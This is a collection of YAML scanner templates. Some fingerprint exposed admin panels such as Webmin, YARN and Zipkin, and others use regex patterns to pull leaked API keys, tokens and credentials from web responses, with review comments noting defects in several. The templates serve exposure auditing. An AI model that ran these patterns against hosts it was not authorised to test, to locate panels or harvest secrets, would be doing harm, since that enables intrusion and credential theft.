2 | # Intended to fingerprint a Traefik dashboard from the body returned for /dashboard/.
3 | info:
4 | name: Traefik Dashboard
5 | author: schniggie,StreetOfHackerR007
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
12 | attack: sniper
13 | threads: 100
14 | # Raw request: each payload entry is substituted into the Host header placeholder.
15 | raw:
16 | - |
17 | GET /dashboard/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "" # NOTE(review): an empty word is a substring of every body and there is no status matcher, so every response is reported as a Traefik dashboard; the marker was presumably lost from this listing — restore it before trusting hits
24 | part: body
25 | # As written, results from this template carry no signal about Traefik and should not be triaged as findings.
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/vigor-login.yaml:
--------------------------------------------------------------------------------
1 | id: vigor-login
2 |
3 | info:
4 | name: Vigor Login Page
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6610
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /weblogin.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Vigor Login Page'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/virtual-ema-detect-1.yaml:
--------------------------------------------------------------------------------
1 | id: virtual-ema-detect 1
2 |
3 | info:
4 | name: Virtual EMS Panel Detection
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /VirtualEms/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login"
24 | - "Browse"
25 | - "Welcome Guest"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/virtual-ema-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: virtual-ema-detect 2 # NOTE(review): the id contains a space while the file is named virtual-ema-detect-2.yaml; confirm the scanner accepts this id
2 | # Fingerprints a Virtual EMS login page: all three words below must appear in the response to /VirtualEms/Login.aspx.
3 | info:
4 | name: Virtual EMS Panel Detection
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 | # NOTE(review): virtual-ema-detect-1.yaml in this listing sends the same request with the same matcher, so the two templates report the same hosts twice.
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
12 | attack: sniper
13 | threads: 100
14 | # Raw request: each payload entry is substituted into the Host header placeholder.
15 | raw:
16 | - |
17 | GET /VirtualEms/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login"
24 | - "Browse"
25 | - "Welcome Guest"
26 | condition: and
27 | # The three words are generic English; the request path is what ties a hit to this product, and no status matcher is present.
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/weave-scope-dashboard-detect.yaml:
--------------------------------------------------------------------------------
1 | id: weave-scope-dashboard-detect
2 |
3 | info:
4 | name: Weave Scope Dashboard
5 | author: e_schultze_
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Weave Scope"
24 | - "__WEAVEWORKS_CSRF_TOKEN"
25 | - "__CSRF_TOKEN_PLACEHOLDER__"
26 | condition: and
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webeditors-2.yaml:
--------------------------------------------------------------------------------
1 | id: webeditors 2
2 |
3 | info:
4 | name: Web Editors
5 | author: princechaddha
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /ckeditor/samples/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "FCKeditor"
24 | - "CKEditor Samples"
25 | - "http://ckeditor.com"
26 | - "init_spell()"
27 | - "'tip':'"
28 | condition: or
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webmin-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: webmin-panel 1
2 |
3 | info:
4 | name: Webmin Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login to Webmin"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/webmin-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: webmin-panel 2
2 |
3 | info:
4 | name: Webmin Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /webmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Login to Webmin"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/xenforo-login.yaml:
--------------------------------------------------------------------------------
1 | id: xenforo-login
2 | # Flags a response to /index.php whose content contains the string 'XenForo'.
3 | info:
4 | name: XenForo Login/Register
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22
8 | tags: panel
9 | # NOTE(review): the reference query filters on the page title, but the matcher below is not restricted to the title.
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
13 | attack: sniper
14 | threads: 100
15 | # Raw request: each payload entry is substituted into the Host header placeholder.
16 | raw:
17 | - |
18 | GET /index.php HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - 'XenForo' # a bare product name also matches pages that merely mention XenForo; presumably markup around it was lost from this listing
25 | condition: and # has no effect with a single word in the list
26 | # No status matcher is present, so error pages containing the word are reported too.
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/yarn-manager-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: yarn-manager-exposure
2 | # Flags a YARN ResourceManager web UI that answers /cluster/cluster without an authenticated identity.
3 | info:
4 | name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
12 | attack: sniper
13 | threads: 100
14 | # Raw request: each payload entry is substituted into the Host header placeholder.
15 | raw:
16 | - |
17 | GET /cluster/cluster HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - 'hadoop'
24 | - 'resourcemanager'
25 | - 'logged in as: dr.who' # dr.who is Hadoop's default static web user, so this string means the UI served the page to an anonymous caller
26 | condition: and # all three strings must be present; a hit is a cue to put the UI behind authentication or restrict network access to it
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zenario-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: zenario-login-panel
2 |
3 | info:
4 | name: Zenario Admin login
5 | author: __Fazal
6 | severity: info
7 | tags: panel,zenario
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zenario/admin/welcome.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "Welcome to Zenario"
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zentao-detect.yaml:
--------------------------------------------------------------------------------
1 | id: zentao-detect
2 |
3 | info:
4 | name: Zentao detect
5 | author: pikpikcu
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zentao/index.php?mode=getconfig HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - '"sessionName":"zentaosid"'
24 | - '{"version":"'
25 | part: body
26 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zipkin-exposure-1.yaml:
--------------------------------------------------------------------------------
1 | id: zipkin-exposure 1
2 |
3 | info:
4 | name: Zipkin Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "webpackJsonpzipkin-lens"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/zipkin-exposure-2.yaml:
--------------------------------------------------------------------------------
1 | id: zipkin-exposure 2
2 |
3 | info:
4 | name: Zipkin Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /zipkin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "webpackJsonpzipkin-lens"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/amazon-sns-topic.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-sns-topic
2 |
3 | info:
4 | name: Amazon SNS Topic Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,amazon
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/artifactory-api-password.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-password
2 |
3 | info:
4 | name: Artifactory Password Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/artifactory-api-token.yaml:
--------------------------------------------------------------------------------
1 | id: artifactory-api-token
2 |
3 | info:
4 | name: Artifactory API Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,artifactory
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/aws-access-key-value.yaml:
--------------------------------------------------------------------------------
1 | id: aws-access-key-value
2 | # Extracts strings shaped like AWS access key IDs from the body of the site root.
3 | info:
4 | name: AWS Access Key ID Value
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,aws,amazon
8 | # Only an extractor is defined (no matchers), so the output is whatever the regex below captures.
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt # absolute local path; the template cannot run unless this file exists
12 | attack: sniper
13 | threads: 100
14 | # Raw request: each payload entry is substituted into the Host header placeholder.
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" # a known identifier prefix followed by 16 uppercase alphanumerics; unanchored, so it can also fire inside longer uppercase strings
27 | # The pattern captures the key ID only, not the secret access key. Treat a hit as a lead: check the same response for the paired secret and rotate the key if one is exposed.
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/bitly-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: bitly-secret-key
2 |
3 | info:
4 | name: Bitly Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,bitly
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'R_[0-9a-f]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/braintree-access-token.yaml:
--------------------------------------------------------------------------------
1 | id: braintree-access-token
2 |
3 | info:
4 | name: PayPal Braintree Access Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/cloudinary-credentials.yaml:
--------------------------------------------------------------------------------
1 | id: cloudinary-credentials
2 |
3 | info:
4 | name: Cloudinary Credentials Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,cloudinary
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/discord-webhook.yaml:
--------------------------------------------------------------------------------
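1 | id: discord-webhook  # reports Discord webhook URLs found in a response body
2 |
3 | info:
4 | name: Discord Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,discord
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:  # matches both the legacy discordapp.com host and discord.com; '_' is allowed in the token so a match is not cut short at an underscore
26 | - 'https://(?:discordapp|discord)\.com/api/webhooks/[0-9]+/[A-Za-z0-9_\-]+'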
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/fcm-server-key.yaml:
--------------------------------------------------------------------------------
1 | id: fcm-server-key
2 |
3 | info:
4 | name: FCM Server Key
5 | author: absshax
6 | severity: high
7 | tags: exposure,token,google
8 | reference: https://abss.me/posts/fcm-takeover
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | extractors:
24 | - type: regex
25 | part: body
26 | regex:
27 | - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/google-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-api-key
2 |
3 | info:
4 | name: Google API Key
5 | author: Swissky
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /hopfully404 HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "AIza[0-9A-Za-z\\-_]{35}"
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/google-calendar-link.yaml:
--------------------------------------------------------------------------------
1 | id: google-calendar-link
2 |
3 | info:
4 | name: Google Calendar URI Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/jdbc-connection-string.yaml:
--------------------------------------------------------------------------------
1 | id: jdbc-connection-string
2 |
3 | info:
4 | name: JDBC Connection String Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/jwt-token.yaml:
--------------------------------------------------------------------------------
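1 | id: jwt-token  # reports JWT-shaped strings (three dot-separated base64url segments) in a response body
2 |
3 | info:
4 | name: JWT Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:  # header and payload are base64url, so '-' and '_' are valid there as well as in the signature; without them such tokens are missed
26 | - 'eyJ[a-zA-Z0-9_\-]{10,}\.eyJ[a-zA-Z0-9_\-]{10,}\.[a-zA-Z0-9_\-]{10,}'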
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/mailchimp-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: mailchimp-access-key-value
2 |
3 | info:
4 | name: Mailchimp API Value
5 | author: puzzlepeaches
6 | severity: info
7 | tags: exposure,token,mailchimp
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "[0-9a-f]{32}-us[0-9]{1,2}"
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-admin-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-admin-api-key
2 |
3 | info:
4 | name: Admin API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRAA-[a-f0-9]{27}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-insights-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-insights-key
2 |
3 | info:
4 | name: Insights Keys Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-rest-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-rest-api-key
2 |
3 | info:
4 | name: REST API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRRA-[a-f0-9]{42}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/newrelic-synthetics-location-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-synthetics-location-key
2 |
3 | info:
4 | name: Synthetics Location Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/oauth-access-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-oauth-access-key
2 |
3 | info:
4 | name: Google OAuth Access Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'ya29\.[0-9A-Za-z\-_]+'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/picatic-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: picatic-api-key  # reports strings shaped like a Picatic live API key in a response body
2 |
3 | info:
4 | name: Picatic API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt  # absolute path under one user's home directory; the wordlist must exist at this location on the scanning host
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:  # NOTE(review): the sk_live_ prefix is also covered by stripe-secret-key.yaml ('sk_(?:live|test)_[0-9a-zA-Z]{24}'), so one string can be reported by both templates; confirm the provider during triage
26 | - 'sk_live_[0-9a-z]{32}'
